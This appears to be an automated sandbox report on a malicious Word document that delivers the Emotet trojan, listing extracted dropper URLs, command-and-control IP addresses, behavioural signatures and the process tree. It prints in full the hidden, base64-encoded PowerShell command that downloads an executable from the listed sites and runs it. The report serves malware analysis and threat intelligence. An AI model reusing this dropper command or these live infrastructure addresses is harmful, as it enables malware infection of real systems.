Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    25-01-2020 21:48

General

  • Target

    ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8.doc

  • Sample

    200125-mh2dmwb2l6

  • SHA256

    ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.yuzemin.com/wp-admin/2dWf/

exe.dropper

https://lmheritage.com/wp-content/6Vh5hy7QE7/

exe.dropper

http://www.videract.com/pnllsek25ksj/Fnw81309/

exe.dropper

http://www.theophile-ministere.com/cgi-bin/vLG0JG7N/

exe.dropper

https://icm.company/cgi-bin/c142/

Extracted

Family

emotet

C2

186.138.186.74:443

190.24.243.186:80

68.174.15.223:80

68.183.170.114:8080

45.79.95.107:443

192.241.143.52:8080

159.65.241.220:8080

142.93.114.137:8080

70.123.95.180:80

62.75.143.100:7080

91.242.136.103:80

109.169.86.13:8080

202.62.39.111:80

181.231.220.232:80

188.216.24.204:80

86.42.166.147:80

186.15.83.52:8080

178.79.163.131:8080

114.109.179.60:80

110.170.65.146:80

rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4940
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABPAGMAbQBhAGQAbQB6AGIAdgBhAGgAPQAnAFAAbgB5AGIAdABxAHYAbgB0ACcAOwAkAFEAZQByAG8AZQB4AHcAeQBhAHQAegBmAGkAIAA9ACAAJwA1ADQAMQAnADsAJABKAGUAcQBxAGIAeABzAHMAeAB3AHQAYQBtAD0AJwBSAGMAdwBvAHcAegByAGkAbQB1ACcAOwAkAEQAYQByAG4AbAB2AG4AbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBlAHIAbwBlAHgAdwB5AGEAdAB6AGYAaQArACcALgBlAHgAZQAnADsAJABSAGQAYwB2AG8AbwBhAHQAaQBpAD0AJwBDAHAAZQBpAHQAdQB4AG8AcgBoAGUAawAnADsAJABaAGoAZgBuAGUAdgBrAGgAegBlAHEAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBMAGkARQBOAHQAOwAkAFAAcQBsAHcAZABpAHAAcwBiAGoAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AHUAegBlAG0AaQBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyAGQAVwBmAC8AKgBoAHQAdABwAHMAOgAvAC8AbABtAGgAZQByAGkAdABhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADYAVgBoADUAaAB5ADcAUQBFADcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB2AGkAZABlAHIAYQBjAHQALgBjAG8AbQAvAHAAbgBsAGwAcwBlAGsAMgA1AGsAcwBqAC8ARgBuAHcAOAAxADMAMAA5AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AdABoAGUAbwBwAGgAaQBsAGUALQBtAGkAbgBpAHMAdABlAHIAZQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYATABHADAASgBHADcATgAvACoAaAB0AHQAcABzADoALwAvAGkAYwBtAC4AYwBvAG0AcABhAG4AeQAvAGMAZwBpAC0AYgBpAG4ALwBjADEANAAyAC8AJwAuACIAUwBQAGAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABDAHoAcgB2AGUAdgBkAG0AYQBwAHUAYgBlAD0AJwBJAGIAaQBxAGMAbABoAHYAagBwACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAG0AbAByAGsAYwBkAHcAZwBjAHIAIABpAG4AIAAkAFAAcQBsAHcAZABpAHAAcwBiAGoAKQB7AHQAcgB5AHsAJABaAGoAZgBuAGUAdgBrAGgAegBlAHEALgAiAEQATwB3AE4AYABsAG8AYQBkAEYAYABJAGwARQAiACgAJABZAG0AbAByAGsAYwBkAHcAZwBjAHIALAAgACQARABhAHIAbgBsAHYAbgBtACkAOwAkAEoAdQBrAHoAcgB5AG8AbABhAGIAbQBlAHEAPQAnAE8AcABuAHIAcQBsAGMAaQBmAHYAdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEQAYQByAG4AbAB2AG4AbQApAC4AIgBsAEUAbgBgAEcAdABIACIAIAAtAGcAZQAgADMANQA4ADYAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAGEAcgBuAGwAdgBuAG0AKQA7ACQARQBpAGcAbQB6AHUAcgBwAHAAZABkAHAAPQAnAEcAbwBlAGEAbQB2AHMAZgB3AHkAJwA7AGIAcgBlAGEAawA7ACQARwBsAGYAZQB4AGQAYQByAHcAdAA9ACcAUgB2AHkAeQBhAGsAbwBhAGsAcgBjAHEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASABzAGIAegBtAGkAbABuAG8AZwBrAGwAPQAnAFAAagBvAG4AaQBtAGoAcgB3AHUAZQBtAGoAJwA=
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    PID:3700
    • C:\Users\Admin\541.exe
      "C:\Users\Admin\541.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4724
      • C:\Users\Admin\541.exe
        --e3dadc10
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4680

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\541.exe
  • C:\Users\Admin\541.exe
  • C:\Users\Admin\541.exe
  • memory/4680-14-0x0000000002110000-0x0000000002126000-memory.dmp
    Filesize

    88KB

  • memory/4680-15-0x0000000000400000-0x0000000000488000-memory.dmp
    Filesize

    544KB

  • memory/4724-12-0x0000000002100000-0x0000000002116000-memory.dmp
    Filesize

    88KB